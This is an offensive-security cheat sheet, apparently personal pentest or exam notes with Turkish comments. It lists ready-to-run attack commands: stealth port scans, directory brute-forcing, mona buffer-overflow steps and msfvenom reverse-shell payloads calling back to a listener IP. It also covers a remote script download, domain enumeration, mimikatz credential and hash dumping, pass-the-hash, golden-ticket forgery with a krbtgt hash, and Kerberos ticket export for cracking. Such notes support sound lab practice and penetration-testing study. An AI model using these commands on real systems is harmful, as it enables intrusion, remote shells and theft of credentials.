nmap -sS -sV -v IP -p- #Tüm portlara stealth scan at.
gobuster dir -u http://192.168.174.101/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 #dir taraması
#-x php,txt,py,c,js,bak,gz,tar,html,db,php.bak,key,jsp,asp # extension taraması
#-b 404 -s 201 # status code özelleştirme
!mona config -set workingfolder c:\mona%p
!mona bytearray -b "\x00"
!mona compare -f C:\mona<PATH>\bytearray.bin -a <ESP_ADDRESS/EBX_ADDRESS>
--
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.136 LPORT=4444 -b "\x00\x0a\x0d\x20\x37" -o exploit.txt
sfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.136 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f c
msfvenom -p windows/exec CMD="cmd.exe" -b '\x00\x0a\x1a' -f c
msf-pattern_create -l 5000 > exploit.txt
msf-pattern_offset -q 413461A2 -l 5000
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh
sudo -l
net user # Enumerate all of the local accounts.
net user /domain # Enumerate all users in the entire domain.
net user admin_onur /domain # Enumerate spesific 'admin_onur' user in the domain.
net group /domain # Enumerate all the groups in the domain.
privilege::debug # admin
lsadump::lsa /patch # ntlm pass hashes dump
klist #cached tickets
sekurlsa::logonpasswords #dump pass hashes
sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
kerberos::golden /user:susan(herhangi bi user) /domain:exam.com /sid:S-1-5-21-88558181-3850747640-3669402957 /krbtgt:345caf37c36688f0afabed009787b7b2 /ptt
misc::cmd
PsExec64.exe \dc01 cmd.exe # powershell veya cmd acildiginda dcye baglan
PTT:
sekurlsa::tickets /export
/usr/share/kerberoast/kirbi2john.py mssqlsvc.kirbi
https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview